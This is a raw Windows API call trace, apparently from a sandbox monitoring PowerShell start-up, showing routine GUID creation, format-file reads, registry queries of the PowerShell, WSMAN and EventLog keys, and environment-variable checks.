	[0397.428] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xcdc0a89d, Data2=0x1ced, Data3=0x451d, Data4=([0]=0x9b, [1]=0xf, [2]=0x9a, [3]=0xae, [4]=0xa, [5]=0x9f, [6]=0xd1, [7]=0x37))) returned 0x0
	[0397.429] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x819ac70a, Data2=0xcb1d, Data3=0x4182, Data4=([0]=0xa3, [1]=0x12, [2]=0x9b, [3]=0x84, [4]=0x1c, [5]=0x4d, [6]=0x4b, [7]=0xd4))) returned 0x0
	[0397.429] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.429] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x265af8b1, Data2=0xaa0f, Data3=0x48c1, Data4=([0]=0xab, [1]=0xae, [2]=0x9d, [3]=0xd6, [4]=0xbc, [5]=0xe6, [6]=0x3a, [7]=0xa7))) returned 0x0
	[0397.429] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xf62223e7, Data2=0xbbfd, Data3=0x45fe, Data4=([0]=0xb1, [1]=0xcc, [2]=0x87, [3]=0x3e, [4]=0x90, [5]=0xdf, [6]=0x24, [7]=0x29))) returned 0x0
	[0397.429] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x448c3b84, Data2=0x88ca, Data3=0x4158, Data4=([0]=0xb1, [1]=0x90, [2]=0x2c, [3]=0xee, [4]=0x96, [5]=0x8b, [6]=0x19, [7]=0x18))) returned 0x0
	[0397.429] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x7640d979, Data2=0x9b25, Data3=0x4a10, Data4=([0]=0xac, [1]=0x16, [2]=0x7f, [3]=0xd8, [4]=0xf3, [5]=0x46, [6]=0xf7, [7]=0x49))) returned 0x0
	[0397.429] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x6d747719, Data2=0x3994, Data3=0x4268, Data4=([0]=0x9f, [1]=0x32, [2]=0xdf, [3]=0xa3, [4]=0x66, [5]=0x9, [6]=0x68, [7]=0x96))) returned 0x0
	[0397.430] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.430] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xb2193a7b, Data2=0xbee6, Data3=0x4937, Data4=([0]=0xba, [1]=0x11, [2]=0xb7, [3]=0x19, [4]=0x96, [5]=0x97, [6]=0x1b, [7]=0xb8))) returned 0x0
	[0397.430] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xa333b51b, Data2=0x651d, Data3=0x4ffe, Data4=([0]=0x9d, [1]=0xbf, [2]=0x9b, [3]=0xaa, [4]=0x2e, [5]=0x3, [6]=0xc1, [7]=0xbf))) returned 0x0
	[0397.430] VirtualQuery (in: lpAddress=0x16c090, lpBuffer=0x16cf50, dwLength=0x30 | out: lpBuffer=0x16cf50*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.430] VirtualQuery (in: lpAddress=0x16c090, lpBuffer=0x16cf50, dwLength=0x30 | out: lpBuffer=0x16cf50*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.430] VirtualQuery (in: lpAddress=0x16c090, lpBuffer=0x16cf50, dwLength=0x30 | out: lpBuffer=0x16cf50*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.430] VirtualQuery (in: lpAddress=0x16c090, lpBuffer=0x16cf50, dwLength=0x30 | out: lpBuffer=0x16cf50*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.430] SetErrorMode (uMode=0x1) returned 0x1
	[0397.430] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0397.431] SetErrorMode (uMode=0x1) returned 0x1
	[0397.431] GetFileType (hFile=0x2f8) returned 0x1
	[0397.431] ReadFile (in: hFile=0x2f8, lpBuffer=0x3170708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3170708*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.431] ReadFile (in: hFile=0x2f8, lpBuffer=0x3170708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3170708*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.432] ReadFile (in: hFile=0x2f8, lpBuffer=0x3170708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3170708*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.432] ReadFile (in: hFile=0x2f8, lpBuffer=0x3170708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3170708*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.432] ReadFile (in: hFile=0x2f8, lpBuffer=0x3170708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3170708*, lpNumberOfBytesRead=0x16d3b8*=0x8b4, lpOverlapped=0x0) returned 1
	[0397.432] ReadFile (in: hFile=0x2f8, lpBuffer=0x316fb24, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x316fb24*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0397.432] ReadFile (in: hFile=0x2f8, lpBuffer=0x3170708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3170708*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0397.432] SetErrorMode (uMode=0x1) returned 0x1
	[0397.432] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d360 | out: lpFileInformation=0x16d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0397.432] SetErrorMode (uMode=0x1) returned 0x1
	[0397.433] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d448 | out: phkResult=0x16d448*=0x2f8) returned 0x0
	[0397.433] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3cc, lpData=0x0, lpcbData=0x16d3c8*=0x0 | out: lpType=0x16d3cc*=0x1, lpData=0x0, lpcbData=0x16d3c8*=0x56) returned 0x0
	[0397.433] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c40b0
	[0397.433] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d39c, lpData=0x1b7c40b0, lpcbData=0x16d398*=0x56 | out: lpType=0x16d39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d398*=0x56) returned 0x0
	[0397.433] CoTaskMemFree (pv=0x1b7c40b0) 
	[0397.433] RegCloseKey (hKey=0x2f8) returned 0x0
	[0397.433] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xcf7866bc, Data2=0x9b4b, Data3=0x40da, Data4=([0]=0x9e, [1]=0x24, [2]=0xe8, [3]=0x37, [4]=0x4, [5]=0x95, [6]=0x28, [7]=0x99))) returned 0x0
	[0397.433] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x8040ed25, Data2=0x752f, Data3=0x41db, Data4=([0]=0x84, [1]=0xbe, [2]=0x2e, [3]=0x5f, [4]=0x20, [5]=0x38, [6]=0xb0, [7]=0xb9))) returned 0x0
	[0397.433] SetErrorMode (uMode=0x1) returned 0x1
	[0397.434] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0397.434] SetErrorMode (uMode=0x1) returned 0x1
	[0397.434] GetFileType (hFile=0x2f8) returned 0x1
	[0397.434] ReadFile (in: hFile=0x2f8, lpBuffer=0x31ae4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x31ae4f0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.435] ReadFile (in: hFile=0x2f8, lpBuffer=0x31ae4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x31ae4f0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.435] ReadFile (in: hFile=0x2f8, lpBuffer=0x31ae4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x31ae4f0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.435] ReadFile (in: hFile=0x2f8, lpBuffer=0x31ae4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x31ae4f0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.435] ReadFile (in: hFile=0x2f8, lpBuffer=0x31ae4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x31ae4f0*, lpNumberOfBytesRead=0x16d3b8*=0xe98, lpOverlapped=0x0) returned 1
	[0397.435] ReadFile (in: hFile=0x2f8, lpBuffer=0x31adaf0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x31adaf0*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0397.435] ReadFile (in: hFile=0x2f8, lpBuffer=0x31ae4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x31ae4f0*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0397.435] SetErrorMode (uMode=0x1) returned 0x1
	[0397.435] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d360 | out: lpFileInformation=0x16d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0397.436] SetErrorMode (uMode=0x1) returned 0x1
	[0397.436] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d448 | out: phkResult=0x16d448*=0x2f8) returned 0x0
	[0397.436] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3cc, lpData=0x0, lpcbData=0x16d3c8*=0x0 | out: lpType=0x16d3cc*=0x1, lpData=0x0, lpcbData=0x16d3c8*=0x56) returned 0x0
	[0397.436] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c40b0
	[0397.436] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d39c, lpData=0x1b7c40b0, lpcbData=0x16d398*=0x56 | out: lpType=0x16d39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d398*=0x56) returned 0x0
	[0397.436] CoTaskMemFree (pv=0x1b7c40b0) 
	[0397.436] RegCloseKey (hKey=0x2f8) returned 0x0
	[0397.436] VirtualQuery (in: lpAddress=0x16bee0, lpBuffer=0x16cda0, dwLength=0x30 | out: lpBuffer=0x16cda0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.437] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xaaf4a895, Data2=0xd83b, Data3=0x433d, Data4=([0]=0xad, [1]=0xd6, [2]=0x3a, [3]=0x58, [4]=0x9e, [5]=0x8f, [6]=0x8d, [7]=0x8d))) returned 0x0
	[0397.437] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x9da81c25, Data2=0xd653, Data3=0x4eca, Data4=([0]=0x96, [1]=0x94, [2]=0x34, [3]=0xa0, [4]=0xe0, [5]=0x9f, [6]=0x3c, [7]=0xa6))) returned 0x0
	[0397.453] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0397.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0397.453] CoTaskMemFree (pv=0x34e580) 
	[0397.453] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0397.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0397.453] CoTaskMemFree (pv=0x34e580) 
	[0397.453] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0397.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0397.453] CoTaskMemFree (pv=0x34e580) 
	[0397.454] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0397.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0397.454] CoTaskMemFree (pv=0x34e580) 
	[0397.456] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0397.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0397.456] CoTaskMemFree (pv=0x34e580) 
	[0397.457] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0397.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0397.457] CoTaskMemFree (pv=0x34e580) 
	[0397.457] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0397.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0397.457] CoTaskMemFree (pv=0x34e580) 
	[0397.776] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x2f8) returned 0x0
	[0397.778] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d55c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d558, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d55c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d558*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0397.779] CoTaskMemFree (pv=0x0) 
	[0397.779] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0397.779] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x0, lpValueName=0x2f4ad0, lpcchValueName=0x16d608, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d608, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0397.779] CoTaskMemFree (pv=0x2f4ad0) 
	[0397.779] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0397.779] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x1, lpValueName=0x2f4ad0, lpcchValueName=0x16d608, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d608, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0397.779] CoTaskMemFree (pv=0x2f4ad0) 
	[0397.779] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0397.779] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x2, lpValueName=0x2f4ad0, lpcchValueName=0x16d608, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d608, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0397.780] CoTaskMemFree (pv=0x2f4ad0) 
	[0397.780] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d5ec, lpData=0x0, lpcbData=0x16d5e8*=0x0 | out: lpType=0x16d5ec*=0x1, lpData=0x0, lpcbData=0x16d5e8*=0x8) returned 0x0
	[0397.780] CoTaskMemAlloc (cb=0xc) returned 0x2cd540
	[0397.780] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d5bc, lpData=0x2cd540, lpcbData=0x16d5b8*=0x8 | out: lpType=0x16d5bc*=0x1, lpData="2.0", lpcbData=0x16d5b8*=0x8) returned 0x0
	[0397.780] CoTaskMemFree (pv=0x2cd540) 
	[0398.199] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5a8 | out: phkResult=0x16d5a8*=0x1c8) returned 0x0
	[0398.200] RegQueryInfoKeyW (in: hKey=0x1c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d4ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d4ac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4a8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0398.200] CoTaskMemFree (pv=0x0) 
	[0398.200] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0398.200] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x0, lpValueName=0x2f4ad0, lpcchValueName=0x16d558, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d558, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0398.200] CoTaskMemFree (pv=0x2f4ad0) 
	[0398.200] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0398.200] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x1, lpValueName=0x2f4ad0, lpcchValueName=0x16d558, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d558, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0398.200] CoTaskMemFree (pv=0x2f4ad0) 
	[0398.200] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0398.200] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x2, lpValueName=0x2f4ad0, lpcchValueName=0x16d558, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d558, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0398.200] CoTaskMemFree (pv=0x2f4ad0) 
	[0398.200] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d53c, lpData=0x0, lpcbData=0x16d538*=0x0 | out: lpType=0x16d53c*=0x1, lpData=0x0, lpcbData=0x16d538*=0x8) returned 0x0
	[0398.200] CoTaskMemAlloc (cb=0xc) returned 0x365600
	[0398.200] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d50c, lpData=0x365600, lpcbData=0x16d508*=0x8 | out: lpType=0x16d50c*=0x1, lpData="2.0", lpcbData=0x16d508*=0x8) returned 0x0
	[0398.200] CoTaskMemFree (pv=0x365600) 
	[0398.201] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0398.201] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.202] CoTaskMemFree (pv=0x34e580) 
	[0398.206] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0398.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.206] CoTaskMemFree (pv=0x34e580) 
	[0398.212] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x2fc) returned 0x0
	[0398.216] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d54c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d548, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d54c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d548*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0398.216] CoTaskMemFree (pv=0x0) 
	[0398.217] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0398.217] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x0, lpName=0x2f4ad0, lpcchName=0x16d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0398.217] CoTaskMemFree (pv=0x2f4ad0) 
	[0398.217] CoTaskMemFree (pv=0x0) 
	[0398.217] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0398.217] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x1, lpName=0x2f4ad0, lpcchName=0x16d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0398.217] CoTaskMemFree (pv=0x2f4ad0) 
	[0398.217] CoTaskMemFree (pv=0x0) 
	[0398.217] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0398.217] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x2, lpName=0x2f4ad0, lpcchName=0x16d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0398.217] CoTaskMemFree (pv=0x2f4ad0) 
	[0398.217] CoTaskMemFree (pv=0x0) 
	[0398.217] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0398.217] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x3, lpName=0x2f4ad0, lpcchName=0x16d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0398.217] CoTaskMemFree (pv=0x2f4ad0) 
	[0398.217] CoTaskMemFree (pv=0x0) 
	[0398.217] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0398.218] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x4, lpName=0x2f4ad0, lpcchName=0x16d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0398.218] CoTaskMemFree (pv=0x2f4ad0) 
	[0398.218] CoTaskMemFree (pv=0x0) 
	[0398.218] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0398.218] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x5, lpName=0x2f4ad0, lpcchName=0x16d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0398.218] CoTaskMemFree (pv=0x2f4ad0) 
	[0398.218] CoTaskMemFree (pv=0x0) 
	[0398.218] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0398.218] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x6, lpName=0x2f4ad0, lpcchName=0x16d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0398.218] CoTaskMemFree (pv=0x2f4ad0) 
	[0398.218] CoTaskMemFree (pv=0x0) 
	[0398.218] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0398.218] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x7, lpName=0x2f4ad0, lpcchName=0x16d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0398.218] CoTaskMemFree (pv=0x2f4ad0) 
